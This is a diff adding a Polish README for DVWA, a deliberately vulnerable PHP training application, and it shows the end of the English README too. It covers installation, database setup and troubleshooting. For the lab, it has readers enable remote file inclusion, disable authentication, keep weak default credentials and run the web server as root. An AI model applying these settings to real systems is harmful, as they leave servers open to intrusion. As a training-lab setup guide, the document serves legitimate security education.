+$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +By default it uses the file `database/sqli.db`, if you mess it up, simply copy `database/sqli.db.dist` over the top. + +The challenges are exactly the same as for MariaDB, they just run against SQLite3 instead. + +- - - + +👨‍đŸ’ģ Contributors +----- + +Thanks for all your contributions and keeping this project updated. :heart: + +If you have an idea, some kind of improvement or just simply want to collaborate, you are welcome to contribute and participate in the Project, feel free to send your PR. + +

+ + + +

+ +- - - + +## Reporting Vulnerabilities + +To put it simply, please don't! + +Once a year or so, someone will submit a report for a vulnerability they've found in the app, some are well written, sometimes better than I've seen in paid pen test reports, some are just "you are missing headers, pay me". + +In 2023, this elevated to a whole new level when someone decided to request a CVE for one of the vulnerabities, they were given [CVE-2023-39848](https://nvd.nist.gov/vuln/detail/CVE-2023-39848). Much hilarity ensued and time was wasted getting this corrected. + +The app has vulnerabilities, it is deliberate. Most are the well documented ones that you work through as lessons, others are "hidden" ones, ones to find on your own. If you really want to show off your skills at finding the hidden extras, write a blog post or create a video as there are probably people out there who would be interested in learning about them and about how your found them. If you send us the link, we may even include it in the references. + +## Links + +Project Home: + +_Created by the DVWA team_ diff --git a/DVWA/README.pl.md b/DVWA/README.pl.md new file mode 100644 index 00000000..a572a6d7 --- /dev/null +++ b/DVWA/README.pl.md @@ -0,0 +1,612 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA) to aplikacja internetowa, napisana w PHP/MySQL, bardzo podatna na ataki. Jej głÃŗwnym celem jest wspieranie specjalistÃŗw w testowaniu swoich umiejętności i narzędzi w legalnym środowisku, pomoc programistom w lepszym zrozumieniu procesÃŗw zabezpieczania aplikacji internetowych oraz wsparcie zarÃŗwno uczniÃŗw, jak i nauczycieli w nauce bezpieczeństwa aplikacji internetowych w kontrolowanych warunkach. + +Celem DVWA jest **zapoznanie się z najczęściej występującymi podatnościami w aplikacjach internetowych** na **rÃŗÅŧnych poziomach trudności**, za pomocą prostego i intuicyjnego interfejsu. NaleÅŧy pamiętać, Åŧe oprogramowanie to zawiera **zarÃŗwno udokumentowane, jak i nieudokumentowane luki**. Jest to zamierzone. Zachęca się uÅŧytkownikÃŗw do odkrywania jak największej liczby podatności. +- - - + +## OSTRZEÅģENIE! + +Damn Vulnerable Web Application jest bardzo podatny na ataki! **Nie przesyłaj go do folderu public_html na swoim hostingu ani na Åŧadne serwery z dostępem do Internetu**, poniewaÅŧ zostanie to wykorzystane. Zalecamy korzystanie z maszyny wirtualnej (takiej jak [VirtualBox](https://www.virtualbox.org/) lub [VMware](https://www.vmware.com/)), z trybem sieci ustawionym na NAT. W maszynie wirtualnej moÅŧesz pobrać i zainstalować [XAMPP](https://www.apachefriends.org/), ktÃŗry moÅŧe Ci posłuÅŧyć za serwer WWW i bazę danych. + +### ZastrzeÅŧenie + +Nie ponosimy odpowiedzialności za sposÃŗb, w jaki ktoś uÅŧywa tej aplikacji (DVWA). Wyjaśniliśmy cele aplikacji i nie powinna być uÅŧywana w sposÃŗb złośliwy. Ostrzegliśmy uÅŧytkownikÃŗw i podjęliśmy odpowiednie kroki, by zapobiec instalacji DVWA na publicznie dostępnych serwerach. Jeśli coś się stanie z Twoim serwerem w wyniku instalacji DVWA, nie ponosimy za to odpowiedzialności – odpowiedzialność spoczywa na osobie lub osobach, ktÃŗre tę aplikację zainstalowały. + +- - - + +## Licencja + +Ten plik jest częścią Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) jest oprogramowaniem wolnym: moÅŧesz je rozpowszechniać i/lub modyfikować zgodnie z warunkami GNU General Public License, opublikowanymi przez Free Software Foundation, w wersji 3 tej licencji lub (zgodnie z Twoimi preferencjami) dowolnej pÃŗÅēniejszej wersji. + +Damn Vulnerable Web Application (DVWA) jest rozpowszechniana z nadzieją, Åŧe będzie przydatna, ale BEZ JAKIEJKOLWIEK GWARANCJI; nawet bez domniemanej gwarancji PRZYDATNOŚCI HANDLOWEJ lub PRZYDATNOŚCI DO OKREŚLONEGO CELU. Więcej szczegÃŗłÃŗw znajdziesz w GNU General Public License. + +Powinieneś otrzymać kopię GNU General Public License wraz z Damn Vulnerable Web Application (DVWA). Jeśli nie, zobacz . + +- - - + +## Internacionalizacja + +Ten plik jest dostępny w kilku wersjach językowych: +- arabski: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- chiński: [įŽ€äŊ“中文](README.zh.md) +- francuski: [Français](README.fr.md) +- koreański: [한ęĩ­ė–´](README.ko.md) +- perski: [ŲØ§ØąØŗی](README.fa.md) +- polski: [Polski](README.pl.md) +- portugalski: [PortuguÃĒs](README.pt.md) +- hiszpański: [EspaÃąol](README.es.md) +- turecki: [TÃŧrkçe](README.tr.md) +- indonezyjski: [Indonesia](README.id.md) +- wietnamski: [Vietnamese](README.vi.md) + +Jeśli chcesz pomÃŗc przy tłumaczeniu, prosimy o zrobienie PR-a (Pull Request). Pamiętaj jednak, Åŧe PR-y przetłumaczone automatycznie (np. z Google Translate) zostaną odrzucone. Prześlij swoje tłumaczenie, tworząc nowy plik o nazwie `README.xx.md`, gdzie `xx` to dwuliterowy kod języka (zgodnie z [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Pobieranie + +Choć istnieją rÃŗÅŧne wersje DVWA, jedyną wspieraną jest najnowsza wersja z oficjalnego repozytorium GitHub. MoÅŧesz ją sklonować z: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +Lub [pobierz archiwum ZIP z plikami](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Instalacja + +### Filmy instruktaÅŧowe instalacji + +- [Instalacja DVWA na Kali w VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Instalacja DVWA na Windows przy uÅŧyciu XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Instalacja Damn Vulnerable Web Application (DVWA) na Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +Najłatwiejszym sposobem instalacji DVWA jest pobranie i zainstalowanie [XAMPP](https://www.apachefriends.org/), jeśli nie masz jeszcze skonfigurowanego serwera WWW. + +XAMPP to łatwy do zainstalowania pakiet Apache, dostępny na systemach Linux, Solaris, Windows i Mac OS X. Zawiera serwer Apache, MySQL, PHP, Perl, serwer FTP i phpMyAdmin. + +Ten [film](https://youtu.be/Yzksa_WjnY0) przeprowadzi Cię przez proces instalacji dla systemu Windows, ale na innych systemach powinno to wyglądać podobnie. + +### Docker + +Dzięki [hoang-himself](https://github.com/hoang-himself) i [JGillam](https://github.com/JGillam), kaÅŧdy commit na branchu `master` powoduje zbudowanie obrazu Docker, ktÃŗry moÅŧna pobrać z GitHub Container Registry. + +Więcej informacji na temat dostępnych obrazÃŗw moÅŧna znaleÅēć [tutaj](https://github.com/digininja/DVWA/pkgs/container/dvwa). + +#### Pierwsze kroki + +Wymagania: Docker i Docker Compose. + +- Jeśli korzystasz z Docker Desktop, oba narzędzia powinny być juÅŧ zainstalowane. +- Jeśli preferujesz Docker Engine na Linuxie, pamiętaj, aby postępować zgodnie z [instrukcją instalacji](https://docs.docker.com/engine/install/#server). + +**Zapewniamy wsparcie najnowszej wersji Docker.** +Jeśli uÅŧywasz Linuxa, a pakiet Docker pochodzi z menedÅŧera pakietÃŗw, prawdopodobnie teÅŧ zadziała, jednak wsparcie będzie ograniczone. + +Aktualizacja Docker z wersji menedÅŧera pakietÃŗw do wersji głÃŗwnej wymaga usunięcia starych wersji zgodnie z instrukcją dla [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedory](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions) i innych. +Dane Docker (kontenery, obrazy, woluminy itd.) nie powinny być naruszone, jednak w przypadku problemÃŗw moÅŧesz je zgłosić [Dockerowi](https://www.docker.com/support) i w międzyczasie coś sprÃŗbować poszukać. + +Aby rozpocząć: + +1. Uruchom `docker version` i `docker compose version`, aby sprawdzić, czy Docker i Docker Compose są poprawnie zainstalowane. Powinny pojawić się ich wersje. + + Przykład: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + Jeśli nie pojawi się nic lub wyświetli się błąd „command not found”, postępuj zgodnie z wymaganiami wstępnymi, aby skonfigurować Docker i Docker Compose. + +2. Sklonuj lub pobierz to repozytorium i rozpakuj ([Pobieranie](#download)). +3. OtwÃŗrz terminal i przejdÅē do katalogu `DVWA`. +4. Uruchom `docker compose up -d`. + +DVWA jest teraz dostępny pod adresem `http://localhost:4280`. + +**Uwaga, serwer WWW działa na porcie 4280 zamiast standardowego portu 80.** +Więcej na temat tej decyzji znajdziesz w sekcji [Chcę uruchomić DVWA na innym porcie](#i-want-to-run-dvwa-on-a-different-port). + +### Kompilacja lokalna + +Jeśli wprowadziłeś lokalne zmiany i chcesz zbuildować projekt lokalnie, przejdÅē do `compose.yml` i zmień `pull_policy: always` na `pull_policy: build`. + +Uruchomienie `docker compose up -d` powinno spowodować zbudowanie obrazu lokalnie, niezaleÅŧnie od tego, co jest dostępne w rejestrze. + +Zobacz takÅŧe: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +### Wersje PHP + +Zalecamy uÅŧywanie najnowszej, stabilnej wersji PHP, poniewaÅŧ to na tej wersji aplikacja będzie rozwijana i testowana. + +Nie zapewniamy wsparcia dla osÃŗb uÅŧywających PHP 5.x. + +Wersje poniÅŧej 7.3 mają znane błędy, ktÃŗre mogą powodować problemy, większość aplikacji będzie działać, ale niektÃŗre funkcje mogą nie funkcjonować prawidłowo. Jeśli nie masz naprawdę waÅŧnego usprawiedliwienia uÅŧywania starszej wersji, wsparcie nie będzie udzielone. + +### Pakiety dla Linuxa + +Jeśli korzystasz z dystrybucji opartej na Debianie, musisz zainstalować następujące pakiety _(lub ich odpowiedniki)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +Zalecamy wykonanie aktualizacji przed instalacją, aby upewnić się, Åŧe posiadasz najnowsze wersje. + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +Strona będzie działać z MySQL zamiast MariaDB, ale zdecydowanie zalecamy MariaDB, poniewaÅŧ działa bez dodatkowej konfiguracji, podczas gdy w przypadku MySQL konieczne są zmiany, aby działało poprawnie. + +## Konfiguracje + +### Plik konfiguracyjny + +DVWA zawiera tylko wzÃŗr pliku konfiguracyjnego, ktÃŗry naleÅŧy odpowiednio zmodyfikować. W systemie Linux, zakładając, Åŧe znajdujesz się w katalogu DVWA, moÅŧna to zrobić w następujący sposÃŗb: + +`cp config/config.inc.php.dist config/config.inc.php` + +Na Windows moÅŧe to być nieco trudniejsze, jeśli masz ukryte rozszerzenia plikÃŗw; jeśli masz co do tego wątpliwości, tu jest wyjaśnione więcej: +[Jak wyświetlić rozszerzenia plikÃŗw w Windows](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Konfiguracja Bazy Danych + +Aby skonfigurować bazę danych, kliknij przycisk `Setup DVWA` w głÃŗwnym menu, a następnie przycisk `Create / Reset Database`. Spowoduje to utworzenie lub zresetowanie bazy danych. + +Jeśli pojawi się błąd podczas tworzenia bazy danych, upewnij się, Åŧe w pliku `./config/config.inc.php` dane logowania do bazy są poprawne. *Jest to inny plik niÅŧ config.inc.php.dist, ktÃŗry jest przykładowym plikiem.* + +Domyślne wartości zmiennych są następujące: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Uwaga: jeśli korzystasz z MariaDB zamiast MySQL (MariaDB jest domyślną bazą danych w Kali), nie moÅŧesz uÅŧyć uÅŧytkownika root bazy danych, musisz utworzyć nowego uÅŧytkownika bazy danych. Aby to zrobić, połącz się z bazą danych jako uÅŧytkownik root, a następnie uÅŧyj następujących poleceń: + +```mariadb +MariaDB [(none)]> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +MariaDB [(none)]> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Wyłączenie Autoryzacji + +NiektÃŗre narzędzia nie wspÃŗłgrają z autoryzacją, dlatego nie mogą być uÅŧywane z DVWA. Aby to obejść, istnieje opcja w konfiguracji do wyłączenia sprawdzania autoryzacji. W tym celu ustaw następującą wartość w pliku konfiguracyjnym: + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` + +Będziesz takÅŧe musiał ustawić poziom bezpieczeństwa na odpowiedni do testÃŗw, ktÃŗre chcesz przeprowadzić: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +W tym stanie masz dostęp do wszystkich funkcji bez konieczności logowania się i ustawiania jakichkolwiek plikÃŗw cookie. + +### Uprawnienia do FolderÃŗw + +* `./hackable/uploads/` - Folder ten musi mieć uprawnienia do zapisu dla usługi sieciowej (do przesyłania plikÃŗw). + +### Konfiguracja PHP + +W systemach Linux lokalizacja to prawdopodobnie `/etc/php/x.x/fpm/php.ini` lub `/etc/php/x.x/apache2/php.ini`. + +* Aby umoÅŧliwić zdalne dołączanie plikÃŗw (Remote File Inclusions, RFI): + * `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + * `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +* Aby upewnić się, Åŧe PHP wyświetla wszystkie komunikaty o błędach: + * `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + * `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +Upewnij się, Åŧe po dokonaniu zmian zrestartujesz usługę PHP lub Apache. + +### reCAPTCHA + +Jest to wymagane tylko do laboratorium "Insecure CAPTCHA"; jeśli nie uÅŧywasz tego laboratorium, moÅŧesz pominąć ten krok. + +Wygeneruj parę kluczy API z . + +Następnie umieść je w poniÅŧszych sekcjach pliku `./config/config.inc.php`: + +* `$_DVWA[ 'recaptcha_public_key' ]` +* `$_DVWA[ 'recaptcha_private_key' ]` + +### Domyślne Dane Logowania + +**Domyślna nazwa uÅŧytkownika = `admin`** + +**Domyślne hasło = `password`** + +_...łatwe do złamania metodą brute-force ;)_ + +URL logowania: http://127.0.0.1/login.php + +_Uwaga: Ten adres będzie inny, jeśli zainstalowałeś DVWA w innym katalogu._ +- - - + +## Rozwiązywanie problemÃŗw + +Zakładamy, Åŧe uÅŧywasz dystrybucji opartej na Debianie, takiej jak Debian, Ubuntu lub Kali. W przypadku innych dystrybucji postępuj zgodnie z instrukcjami, dostosowując polecenia, gdzie to konieczne. + +### Kontenery + +#### Chcę uzyskać dostęp do logÃŗw + +Jeśli uÅŧywasz Docker Desktop, logi są dostępne w interfejsie graficznym. +NiektÃŗre drobne szczegÃŗły mogą się zmieniać w nowszych wersjach, ale sposÃŗb dostępu powinien pozostać taki sam. + +![Podgląd DVWA compose](./docs/graphics/docker/overview.png) +![Podgląd logÃŗw DVWA](docs/graphics/docker/detail.png) + +Logi moÅŧna takÅŧe uzyskać z terminala. + +1. OtwÃŗrz terminal i przejdÅē do katalogu DVWA +2. Wyświetl scalone logi + + ```shell + docker compose logs + ``` + + Jeśli chcesz wyeksportować logi do pliku, np. `dvwa.log` + + ```shell + docker compose logs >dvwa.log + ``` + +#### Chcę uruchomić DVWA na innym porcie + +Nie uÅŧywamy domyślnie portu 80 z kilku powodÃŗw: + +- NiektÃŗrzy uÅŧytkownicy mogą juÅŧ korzystać z portu 80. +- NiektÃŗrzy mogą uÅŧywać silnika kontenerÃŗw bez uprawnień root (jak Podman), a port 80 jest portem uprzywilejowanym (< 1024). Konieczna jest dodatkowa konfiguracja (np. ustawienie `net.ipv4.ip_unprivileged_port_start`), ale musisz zbadać to we własnym zakresie. + +MoÅŧesz udostępnić DVWA na innym porcie, zmieniając wiązanie portu w pliku `compose.yml`. +Na przykład, moÅŧesz zmienić + +```yml +ports: + - 127.0.0.1:4280:80 +``` + +na + +```yml +ports: + - 127.0.0.1:8806:80 +``` + +DVWA będzie teraz dostępne pod adresem `http://localhost:8806`. + +Jeśli chcesz, aby DVWA było dostępne nie tylko z Twojego urządzenia, ale takÅŧe w Twojej sieci lokalnej (np. w przypadku konfiguracji maszyny testowej na warsztaty), moÅŧesz usunąć `127.0.0.1:` z mapowania portu (lub zastąpić go swoim adresem IP LAN). Dzięki temu będzie nasłuchiwać na wszystkich dostępnych urządzeniach. Bezpiecznym domyślnym ustawieniem jest nasłuchiwanie wyłącznie na lokalnym urządzeniu loopback, poniewaÅŧ jest to bardzo podatna na ataki aplikacja działająca na Twojej maszynie. + +#### DVWA uruchamia się automatycznie po włączeniu Dockera + +Dołączony plik [`compose.yml`](./compose.yml) automatycznie uruchamia DVWA i jego bazę danych po uruchomieniu Dockera. + +Aby wyłączyć tę opcję, moÅŧesz usunąć lub zakomentować linie `restart: unless-stopped` w pliku [`compose.yml`](./compose.yml). + +Jeśli chcesz tymczasowo wyłączyć tę funkcję, moÅŧesz uruchomić `docker compose stop` lub uÅŧyć Docker Desktop, znaleÅēć `dvwa` i kliknąć Stop. Dodatkowo moÅŧesz usunąć kontenery lub uruchomić `docker compose down`. + +### Pliki logÃŗw + +W systemach Linux Apache generowane są dwa domyślne pliki logÃŗw: `access.log` i `error.log`, a w systemach opartych na Debianie są one zwykle dostępne w `/var/log/apache2/`. + +Podczas zgłaszania błędÃŗw, problemÃŗw itp., prosimy o dołączenie przynajmniej ostatnich pięciu linii z kaÅŧdego z tych plikÃŗw. W systemach opartych na Debianie moÅŧesz to zrobić w następujący sposÃŗb: + +``` +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` +### Przejrzałem stronę i otrzymałem błąd 404 + +Jeśli napotykasz ten problem, musisz zrozumieć lokalizację plikÃŗw. Domyślnie katalog głÃŗwny dokumentÃŗw Apache (miejsce, gdzie szuka zawartości internetowej) to `/var/www/html`. Jeśli umieścisz plik `hello.txt` w tym katalogu, aby uzyskać do niego dostęp, przejdÅē do `http://localhost/hello.txt`. + +Jeśli utworzysz katalog i umieścisz tam plik - `/var/www/html/mydir/hello.txt` - będziesz musiał przejść do `http://localhost/mydir/hello.txt`. + +Linux domyślnie rozrÃŗÅŧnia wielkość liter, więc w powyÅŧszym przykładzie, jeśli sprÃŗbujesz przejść pod ktÃŗrykolwiek z poniÅŧszych adresÃŗw, otrzymasz błąd `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Jak to wpływa na DVWA? Większość osÃŗb korzysta z Gita, aby sklonować DVWA do katalogu `/var/www/html`, co daje im katalog `/var/www/html/DVWA/` ze wszystkimi plikami DVWA wewnątrz. Następnie przechodzą do `http://localhost/`, co skutkuje wyświetleniem błędu `404` lub domyślnej strony powitalnej Apache. PoniewaÅŧ pliki są w katalogu DVWA, musisz przejść do `http://localhost/DVWA`. + +Innym częstym błędem jest przejście pod `http://localhost/dvwa`, co spowoduje wyświetlenie błędu `404`, poniewaÅŧ `dvwa` nie jest tym samym, co `DVWA` według zasad porÃŗwnywania katalogÃŗw w systemie Linux. + +Po konfiguracji, jeśli prÃŗbujesz odwiedzić stronę i otrzymujesz błąd `404`, zastanÃŗw się, gdzie zainstalowałeś pliki, gdzie znajdują się one względem katalogu głÃŗwnego dokumentÃŗw i jaka wielkość liter została uÅŧyta w nazwach katalogÃŗw. + +### "Odmowa dostępu" podczas uruchamiania konfiguracji + +Jeśli podczas uruchamiania skryptu konfiguracji pojawi się poniÅŧszy komunikat, oznacza to, Åŧe nazwa uÅŧytkownika lub hasło w pliku konfiguracyjnym nie pasują do tych skonfigurowanych w bazie danych: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +Błąd ten informuje, Åŧe uÅŧywasz nazwy uÅŧytkownika `notdvwa`. + +PoniÅŧszy błąd oznacza, Åŧe wskazałeś plik konfiguracyjny na niewłaściwą bazę danych. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +To oznacza, Åŧe uÅŧywasz uÅŧytkownika `dvwa` i prÃŗbujesz połączyć się z bazą danych `notdvwa`. + +Pierwszym krokiem jest dokładne sprawdzenie, czy to, co myślisz, Åŧe wpisałeś w pliku konfiguracyjnym, rzeczywiście tam jest. + +Jeśli zgadza się z oczekiwaniami, następnym krokiem jest sprawdzenie, czy moÅŧesz zalogować się jako ten uÅŧytkownik z linii poleceń. Zakładając, Åŧe masz uÅŧytkownika bazy danych `dvwa` i hasło `p@ssw0rd`, wykonaj następujące polecenie: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*Uwaga: Po `-p` nie ma spacji.* + +Jeśli zobaczysz poniÅŧszy komunikat, hasło jest poprawne: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Skoro moÅŧesz połączyć się z linii poleceń, prawdopodobnie coś jest nie tak w pliku konfiguracyjnym, sprawdÅē go ponownie, a jeśli nadal nie działa, zgłoś problem. + +Jeśli zobaczysz poniÅŧszy komunikat, nazwa uÅŧytkownika lub hasło, ktÃŗrych uÅŧywasz, są nieprawidłowe. PowtÃŗrz kroki z [Konfiguracji bazy danych](#database-setup) i upewnij się, Åŧe uÅŧywasz tej samej nazwy uÅŧytkownika i hasła przez cały proces. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Jeśli otrzymasz poniÅŧszy komunikat, poświadczenia uÅŧytkownika są poprawne, ale uÅŧytkownik nie ma dostępu do bazy danych. Ponownie powtÃŗrz kroki konfiguracji i sprawdÅē nazwę bazy danych, ktÃŗrej uÅŧywasz. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +Ostatnim błędem, jaki moÅŧesz otrzymać, jest: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Nie jest to problem z autoryzacją, ale informacja, Åŧe serwer bazy danych nie działa. Uruchom go następującym poleceniem: + +```sh +sudo service mysql start +``` +### Odmowa połączenia + +Błąd podobny do poniÅŧszego: + +``` +Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/sites/dvwa/non-secure/htdocs/dvwa/includes/dvwaPage.inc.php:535 +``` + +oznacza, Åŧe serwer bazy danych nie działa lub masz nieprawidłowy adres IP w pliku konfiguracyjnym. + +SprawdÅē tę linię w pliku konfiguracyjnym, aby zobaczyć, gdzie oczekiwany jest serwer bazy danych: + +``` +$_DVWA[ 'db_server' ] = '127.0.0.1'; +``` + +Następnie przejdÅē do tego serwera i sprawdÅē, czy działa. W systemie Linux moÅŧna to sprawdzić za pomocą: + +``` +systemctl status mariadb.service +``` + +Powinieneś zobaczyć coś podobnego, najwaÅŧniejsza część to `active (running)`. + +``` +● mariadb.service - MariaDB 10.5.19 database server + Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; preset: enabled) + Active: active (running) since Thu 2024-03-14 16:04:25 GMT; 1 week 5 days ago +``` + +Jeśli serwer nie działa, moÅŧesz go uruchomić poleceniem: + +``` +sudo systemctl start mariadb.service +``` + +Pamiętaj o `sudo` i wpisaniu hasła uÅŧytkownika Linuxa, jeśli zostaniesz o to poproszony. + +W systemie Windows sprawdÅē status w konsoli XAMPP. + +### Nieznana metoda uwierzytelniania + +W najnowszych wersjach MySQL domyślna konfiguracja uniemoÅŧliwia PHP komunikację z bazą danych. Jeśli podczas uruchamiania skryptu konfiguracji pojawi się następujący komunikat, oznacza to problem z konfiguracją: + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Masz dwie opcje, najprostszą jest odinstalowanie MySQL i zainstalowanie MariaDB. Oficjalny przewodnik projektu MariaDB moÅŧna znaleÅēć tutaj: + + + +Alternatywnie, postępuj zgodnie z poniÅŧszymi krokami: + +1. Jako root edytuj plik: `/etc/mysql/mysql.conf.d/mysqld.cnf` +2. Pod linią `[mysqld]` dodaj następujące: + `default-authentication-plugin=mysql_native_password` +3. Zrestartuj bazę danych: `sudo service mysql restart` +4. SprawdÅē metodę uwierzytelniania dla uÅŧytkownika bazy danych: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +5. Prawdopodobnie zobaczysz `caching_sha2_password`. Jeśli tak, wykonaj następujące polecenie: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +6. Po ponownym sprawdzeniu powinieneś zobaczyć `mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +Po wykonaniu tych krokÃŗw proces konfiguracji powinien działać normalnie. + +Więcej informacji moÅŧna znaleÅēć na stronie: . + +### Błąd bazy danych #2002: Brak takiego pliku lub katalogu. + +Serwer bazy danych nie działa. W dystrybucji opartej na Debianie moÅŧesz go uruchomić za pomocą: + +```sh +sudo service mysql start +``` +### Błędy „MySQL server has gone away” i „Packets out of order” + +Istnieje kilka przyczyn pojawienia się tych błędÃŗw, ale najbardziej prawdopodobną jest niekompatybilność wersji serwera bazy danych z wersją PHP. + +Jest to najczęściej spotykane, gdy uÅŧywasz najnowszej wersji MySQL, poniewaÅŧ wspÃŗłpraca między PHP a MySQL nie zawsze przebiega dobrze. Najlepszą radą jest przejście na MariaDB, poniewaÅŧ z tego problemu nie moÅŧemy zapewnić wsparcia. + +Więcej informacji znajdziesz tutaj: + + + +### Nie działa Command Injection + +Apache moÅŧe nie mieć wystarczających uprawnień do uruchamiania poleceń na serwerze WWW. Jeśli uruchamiasz DVWA na systemie Linux, upewnij się, Åŧe jesteś zalogowany jako root. W systemie Windows zaloguj się jako administrator. + +### Dlaczego baza danych nie moÅŧe się połączyć na CentOS? + +MoÅŧesz napotkać problemy z SELinux. MoÅŧesz wyłączyć SELinux lub uruchomić poniÅŧsze polecenie, aby umoÅŧliwić serwerowi WWW połączenie z bazą danych: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Cokolwiek Innego + +W celu uzyskania najnowszych informacji o rozwiązywaniu problemÃŗw, przeczytaj zarÃŗwno otwarte, jak i zamknięte zgłoszenia w repozytorium Gita: + + + +Przed przesłaniem zgłoszenia upewnij się, Åŧe uÅŧywasz najnowszej wersji kodu z repozytorium, a nie najnowszego wydania, tylko kodu z głÃŗwnej gałęzi. + +Przy zgłaszaniu błędu podaj co najmniej następujące informacje: + +- System operacyjny +- Ostatnie 5 linii z dziennika błędÃŗw serwera WWW bezpośrednio po wystąpieniu zgłaszanego błędu +- Jeśli jest to problem z uwierzytelnianiem do bazy danych, przejdÅē przez powyÅŧsze kroki i wykonaj zrzuty ekranu z kaÅŧdego kroku. Dołącz je razem z fragmentem pliku konfiguracyjnego zawierającym nazwę uÅŧytkownika i hasło do bazy danych. +- Pełen opis problemu, oczekiwany rezultat i działania, jakie podjąłeś, aby go rozwiązać. „Login nie działa” nie wystarczy, abyśmy zrozumieli TwÃŗj problem i mogli pomÃŗc. + +- - - + +## Wstrzykiwanie SQL w SQLite3 + +_Wsparcie dla tego jest ograniczone; przed zgłaszaniem problemÃŗw upewnij się, Åŧe jesteś gotowy do pracy nad debugowaniem, nie zgłaszaj po prostu „to nie działa”._ + +Domyślnie SQLi i Blind SQLi są przeprowadzane na serwerze MariaDB/MySQL uÅŧywanym przez witrynę, ale moÅŧna przełączyć testowanie SQLi na SQLite3. + +Nie będę omawiać konfiguracji SQLite3 z PHP, ale powinno wystarczyć zainstalowanie pakietu `php-sqlite3` i upewnienie się, Åŧe jest włączony. + +Aby dokonać przełączenia, edytuj plik konfiguracyjny i dodaj lub zmodyfikuj te linie: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Domyślnie uÅŧywany jest plik `database/sqli.db`; jeśli go uszkodzisz, po prostu skopiuj `database/sqli.db.dist` na jego miejsce. + +Wyzwania są dokładnie takie same, jak dla MySQL, tyle Åŧe działają na SQLite3. + +- - - + +👨‍đŸ’ģ WspÃŗłtwÃŗrcy +----- + +Dziękujemy za wszystkie wkłady i aktualizacje projektu. :heart: + +Jeśli masz pomysł, propozycję ulepszenia lub po prostu chcesz wspÃŗłpracować, zapraszamy do udziału w projekcie, śmiało przesyłaj swoje PR. + +

+ + + +

